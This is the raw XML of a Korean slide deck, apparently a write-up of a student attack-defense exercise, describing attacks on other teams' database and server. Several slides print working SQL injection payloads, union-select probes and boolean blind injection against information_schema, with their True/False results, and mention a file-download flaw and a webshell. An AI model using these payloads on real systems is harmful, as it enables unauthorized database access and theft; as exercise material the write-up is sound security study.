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11B48-711E-E1A1-C0D1-28D62A78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F081C-5D66-E410-A401-DF61AEE6A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ACA15-15DB-0736-616E-59597F65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3E55-C747-4944-8CDA-BCAD6566863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C7FA7-D0C1-84C1-645F-4452064F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76C4F-96BE-1373-F4B2-C9C0E142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8068-1219-46D8-8F33-FA5822771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0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9F802-1FAC-A554-1003-C079C128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2B7D78-6C32-A82E-B629-840E50DDD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27462-4A45-43E8-CC76-C6A7BA7B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3E55-C747-4944-8CDA-BCAD6566863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2E199-3BF4-9E6A-123D-E0C2FE4A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43415-426E-66A7-8D79-2BC86878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8068-1219-46D8-8F33-FA5822771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1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95DB1E-BC56-6973-0805-5D70FF88B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665A7-49DF-4837-DEC8-6DE57FF17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AB649-4C23-7ED8-1846-76D0DDF5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3E55-C747-4944-8CDA-BCAD6566863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22A84-D870-1CD1-02C1-F670A2CE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7D4B7-EFD1-CFDD-6285-120623BD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8068-1219-46D8-8F33-FA5822771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1FB0C-52F2-F609-ADD0-FE2388C0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3DBC7-E767-EBEB-0971-446A1243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9084D-038B-17DF-6588-11F2EF2F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3E55-C747-4944-8CDA-BCAD6566863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6F16D-8DB9-4415-5434-A77310DD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2268B-6858-17B7-3823-6F12BF80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8068-1219-46D8-8F33-FA5822771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0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2F44E-3E96-D1F9-5D4B-CDE4193E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D67868-C584-5D81-E2DB-4F0ED787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11121-A303-B55B-405D-782AFEE1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3E55-C747-4944-8CDA-BCAD6566863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36174-19B6-723D-93F5-819E466D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41407-56E9-0E30-2BD7-34BF1C65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8068-1219-46D8-8F33-FA5822771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7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ED047-A279-2A69-7619-F742A833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81F58-6A3E-2831-305B-450764E75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6B4AC8-AE87-6369-22C1-46C1ED89C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03FAAB-52FE-7B76-A690-5AA7DDC7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3E55-C747-4944-8CDA-BCAD6566863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B8E96-98CB-84E0-B89F-88A0CD64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3F70EA-EF42-606C-E4FA-986AE42A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8068-1219-46D8-8F33-FA5822771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2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23E3B-DB3F-A900-C99D-74D47F07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51C82-5AB6-60D6-41FD-3D45AF59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4E5955-10B4-7BD3-0C78-E3E8A8A6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C77933-CC30-8F90-9BD9-939521B12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20BAEC-6EE1-2E96-786E-3A9101019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16075C-BC73-2D1C-ECF0-BD6E2FB5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3E55-C747-4944-8CDA-BCAD6566863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7E55E4-9D10-E228-BECE-F75C8BB0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C30D06-398C-8241-07E0-38B9257E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8068-1219-46D8-8F33-FA5822771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1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BB9CC-E027-5F78-7BA2-89AF1329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6D718B-DF3D-89E5-31CD-CEADED87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3E55-C747-4944-8CDA-BCAD6566863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B5E32-24D0-DAE9-6CAA-3AEFD977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7E779F-4954-08C6-1047-BC076013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8068-1219-46D8-8F33-FA5822771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84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4AC31A-CD46-13B2-92A4-C6A42B71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3E55-C747-4944-8CDA-BCAD6566863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55283C-A86D-8279-81B2-6EE2B44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57F5E8-462E-8EFB-79BA-932E86F1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8068-1219-46D8-8F33-FA5822771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9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1D070-45D5-1E88-CE59-AC597402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81DF3-05CE-9DEB-E073-9EBEF0017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32C6B-3348-30C7-A656-24041B646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DC57A-38F2-C703-73C3-B40744D7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3E55-C747-4944-8CDA-BCAD6566863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6F7C2-3171-20E5-E437-C0FBDE44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675CB-2319-523D-785F-559DE276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8068-1219-46D8-8F33-FA5822771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6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56479-904B-113A-3371-51970707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895E53-21AD-C63D-D86A-43C457270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F2C4C-1DD1-2F3F-63C6-DA0213BDB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60E65A-EF71-16E8-B978-D9FF4688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3E55-C747-4944-8CDA-BCAD6566863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231DA-3A68-1393-E76F-0CD8F73B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01DCF-DFB9-38E0-F18C-2CCD6FCA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8068-1219-46D8-8F33-FA5822771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2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49747B-9BA6-4D8D-348C-82779FF0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1AE42-E963-F4C5-3C10-C95CDDCC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935C7-12B9-B394-74E2-A6EB55B6C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3E55-C747-4944-8CDA-BCAD6566863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DD818-0C60-EB10-17E1-6164E05DA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9C98D-D69D-FBC6-AB65-F8B06EC7E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8068-1219-46D8-8F33-FA5822771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5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03046-41F5-C9D5-1ADD-EBD98093C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공방전 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Write-up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1BADAC-8B66-5C7B-F859-A26C4AFEE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기 최정원</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="348380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CF800-C8E2-22F9-ECD8-63D77812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ko-KR" altLang="en-US" dirty="0"/>
              <a:t>팀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>한윤슬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75917-CCA0-A036-6A42-5146D0AD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8186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기본적으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>웹셀이</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> 동작하지 않음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F81B8F-338F-6CC3-D7EF-8C9CF3D0D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20" y="2849332"/>
            <a:ext cx="1943371" cy="6096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A71AA09-D694-0F9B-39D0-B902499AF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20" y="4512759"/>
            <a:ext cx="2981741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3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CF800-C8E2-22F9-ECD8-63D77812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ko-KR" altLang="en-US" dirty="0"/>
              <a:t>팀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-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75917-CCA0-A036-6A42-5146D0AD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8186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다운로드 취약점 이용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9179C70-4524-119D-995B-EA08D7CC3695}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4469769"/>
            <a:ext cx="10515600" cy="38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다운받으려는 파일 이름 수정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84F392-57D2-1986-A0CD-CD5CBBF01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6138"/>
            <a:ext cx="5858691" cy="1624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5FFC10-7F9B-3490-C1F8-4CC076FAD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51635"/>
            <a:ext cx="9526329" cy="952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42C322-E37D-A56B-4865-1313091D2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72187"/>
            <a:ext cx="8878539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2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CF800-C8E2-22F9-ECD8-63D77812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ko-KR" altLang="en-US" dirty="0"/>
              <a:t>팀 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>-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75917-CCA0-A036-6A42-5146D0AD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8186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다운받은 파일 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9ABE52-D9E2-6336-69C5-9F9D4FE8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64" y="2522194"/>
            <a:ext cx="2857899" cy="495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F092B2-E912-8EE0-A126-27E97B80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64" y="3402560"/>
            <a:ext cx="421063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2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F30B7-74B4-5ABF-509A-F10FE667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DE9C7-25B4-836A-3D34-8BB28CA7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6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CF800-C8E2-22F9-ECD8-63D77812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팀</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>김인희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75917-CCA0-A036-6A42-5146D0AD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8186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‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>넣기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89C867-1033-80C8-1506-523A0E04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45" y="2207492"/>
            <a:ext cx="11419274" cy="760049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714E5E6-BA98-E68A-AA57-F191FE57A2D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3484345"/>
            <a:ext cx="10515600" cy="760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GPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>한테 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>예상쿼리</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> 물어보기</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>SELECT * FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>your_table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t> WHERE (COLUMN_NAME LIKE '%%' OR CONTENT LIKE ‘% %’) ORDER BY IFNULL(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>parent_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>, bid) DESC, bid ASC LIMIT 0, X;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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F5871C-41D7-384D-50AC-C99BCBF95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5188"/>
            <a:ext cx="690658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6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CF800-C8E2-22F9-ECD8-63D77812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팀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3202C96-C16E-CB09-4CAA-66342C436AC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1933302"/>
            <a:ext cx="10515600" cy="857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union</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>select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sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>공격</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>dummy') union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>null,null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>;-- -</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"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CE879C-84BF-34AF-A6DB-0268C042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14" y="3033648"/>
            <a:ext cx="6220693" cy="62873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FEF5C7-F6BA-50F8-D4E4-EE2F7883A20D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4066966"/>
            <a:ext cx="10515600" cy="148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컬럼 개수 변화</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>dummy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>') union select null,null,null,null,null,null,null,null,null,null,null,null;-- -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" altLang="ko-KR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" dirty="0"/>
              <a:t>query error =&gt; Subquery returns more than 1 row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6C0240F-0F14-6516-6319-F8D4CB7A41C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="5852160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생각보다 쿼리가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>복잡해보임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4239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CF800-C8E2-22F9-ECD8-63D77812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팀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75917-CCA0-A036-6A42-5146D0AD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81866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boolean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>based + blind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>sqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>로 계획 변경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2814D3-9AEC-A3A7-9A6B-6CBB9CC8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2430"/>
            <a:ext cx="10515600" cy="20423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769DEF-C3E7-89ED-EEF3-C0A3EC7E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2" y="4519686"/>
            <a:ext cx="11360727" cy="14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CF800-C8E2-22F9-ECD8-63D77812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팀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75917-CCA0-A036-6A42-5146D0AD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6317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dummy') or ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>(table_name,0x3a,column_name) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>  WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t> = 'flag'),1,1))&gt;1 -- -     -&gt; True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5E419E-D62F-755A-91F7-27C26FBC7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9" y="2616879"/>
            <a:ext cx="10616456" cy="89516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DEFE331-8F3C-28DC-7E69-026D2A4221C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4242254"/>
            <a:ext cx="10515600" cy="65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dummy') or ascii(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>((select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>(table_name,0x3a,column_name) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>  WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t> = 'flag'),1,1))&lt;1 -- -     -&gt; False</a:t>
            </a:r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2B3E4D-49C4-BF22-AF86-0F3DD6B26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9" y="4993314"/>
            <a:ext cx="10515600" cy="12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4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CF800-C8E2-22F9-ECD8-63D77812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팀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75917-CCA0-A036-6A42-5146D0AD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8186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파이썬 스크립트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D18C8E-AB92-A449-0DA8-0F070A3FF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2430"/>
            <a:ext cx="5346707" cy="26773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88B27D-1CF4-60EC-1326-0098C152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05802"/>
            <a:ext cx="10686981" cy="4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1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CF800-C8E2-22F9-ECD8-63D77812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팀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75917-CCA0-A036-6A42-5146D0AD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8186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스크립트 실행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CA7EFF-FAB3-B44B-EA50-58BD0F31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2430"/>
            <a:ext cx="3566213" cy="30394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A1F8E5-44A9-3CA1-E790-C84D6ECF7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678" y="2814883"/>
            <a:ext cx="7249476" cy="198314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594AFE7-07CA-27FC-593D-30FC1B0317F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4748678" y="3620589"/>
            <a:ext cx="7252394" cy="168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1tat83:cs2k9dh59z4q:hbhwbemukp02:klodbqzpfns4:vu82vh</a:t>
            </a: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5w4o3z:z1v8m4flag:flagh59z4q:hbhwbemukp02:klodbqzpfns4:vu82vh</a:t>
            </a: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flag:flagh59z4q:hbhwbejanls1:px5im1mukp02:klodbqzpfns4:vu82vh</a:t>
            </a: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daehh8:ti303yh59z4q:hbhwbejanls1:px5im1mukp02:klodbqoi8kng:mvn9u1zpfns4:vu82vh</a:t>
            </a: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dsifkk:68b3hrh59z4q:hbhwbejanls1:px5im1mukp02:klodbqoi8kng:mvn9u1wrfdvj:xw76z2zpfns4:vu82vh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CF800-C8E2-22F9-ECD8-63D77812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팀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75917-CCA0-A036-6A42-5146D0AD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8186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client.py </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>일부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D932E0-DC1D-B1A6-DC72-8E0014FD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6280"/>
            <a:ext cx="7251707" cy="201126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D40355F-376B-7BBE-9299-1E5137FFD93D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3047134"/>
            <a:ext cx="10515600" cy="775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alter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>가 아닌 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>create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바꾼거라고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> 예상</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>모든 테이블에 대해서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0"/>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>구하기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B89DF2-024C-C53E-1705-B014113A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55" y="4255446"/>
            <a:ext cx="416300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4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CF800-C8E2-22F9-ECD8-63D77812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팀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75917-CCA0-A036-6A42-5146D0AD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8186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flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" dirty="0"/>
              <a:t> 구하는 스크립트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405A93-4DBE-0950-F300-A2F58A8F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3102480"/>
            <a:ext cx="10860016" cy="3096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DEA375-73B6-E7D9-0F55-E3021FF9C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6828"/>
            <a:ext cx="691611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352</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>와이드스크린</PresentationFormat>
  <Paragraphs>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공방전 Write-up</vt:lpstr>
      <vt:lpstr>E팀(김인희) - DB</vt:lpstr>
      <vt:lpstr>E팀 - DB</vt:lpstr>
      <vt:lpstr>E팀 - DB</vt:lpstr>
      <vt:lpstr>E팀 - DB</vt:lpstr>
      <vt:lpstr>E팀 - DB</vt:lpstr>
      <vt:lpstr>E팀 - DB</vt:lpstr>
      <vt:lpstr>E팀 - DB</vt:lpstr>
      <vt:lpstr>E팀 - DB</vt:lpstr>
      <vt:lpstr>G팀(한윤슬) - Server</vt:lpstr>
      <vt:lpstr>G팀 - Server</vt:lpstr>
      <vt:lpstr>G팀 - Server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공방전 Write-up</dc:title>
  <dc:creator>정원 최</dc:creator>
  <cp:lastModifiedBy>정원 최</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-08-08T06:10:44Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-08T10:14:32Z</dcterms:modified>
</cp:coreProperties>
</file>